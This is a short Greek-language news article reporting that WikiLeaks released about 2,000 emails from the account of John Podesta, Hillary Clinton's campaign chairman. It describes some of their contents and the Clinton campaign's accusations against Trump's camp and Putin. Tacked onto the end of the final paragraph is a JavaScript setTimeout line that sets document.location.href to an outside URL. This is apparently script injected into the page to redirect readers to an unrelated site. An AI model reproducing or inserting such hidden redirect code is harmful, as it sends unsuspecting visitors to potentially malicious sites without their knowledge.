Στη δημοσιότητα 2.000 email της καμπάνιας της Χίλαρι από τα WikiLeaks

0
3

 

Περίπου 2.000 email που φέρεται να προέρχονται από τον λογαριασμό του επικεφαλής της προεκλογικής καμπάνιας της Χίλαρι Κλίντον Τζον Ποντέστα έβγαλε στη φόρα ο ιστότοπος Wikileaks, σύμφωνα με το CNN. Αυτή είναι η δεύτερηη λεκτρονική υποκλοπή από τα Wikileaks σε τέσσερις ημέρες, ενώ ο ιστότοπος ισχυρίζεται ότι ήδη διαθέτει περισσότερα από 50.000 ηλεκτρονικά μηνύματα του Ποντέστα, που αφορούν κυρίως το 2015.

Μεταξύ αυτών, περιλαμβάνονται οδηγίες για τον χειρισμό θεμάτων που αφορούν στα ΜΜΕ αλλά και της έκδοσης του βιβλίου «Clinton Cash» στο οποίο αφήνονται υπονοιες για ύποπτες δραστηριότητες του Ιδρύματος Κλίντον. Ανάμεσα στα μηνύματα υπάρχει κι ένα του συμβούλου της Κλίντον Ντουκ Μπαντ, ο οποίος χαρακτηρίζει την κόρη της Τσέλσι Κλίντον «κακομαθημένο κολεγιόπαιδο».

Οι εκπρόσωποι της Κλίντον αντέδρασαν στη δημοσιοποίηση των μηνυμάτων κατηγορώντας το στρατόπεδο του αντιπάλου της Ντόναλντ Τραμπ επειδή ο σύμβουλος του Τραμπ Τέισον Μίλερ δημοσιοποίησε ηλεκτρονικό σύνδεσμο στο Twitter επιχαίροντας κάτι που οργανώθηκε από τον Ρώσο πρόεδρο Βλαντίμιρ Πούτιν, όπως τονίζουν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here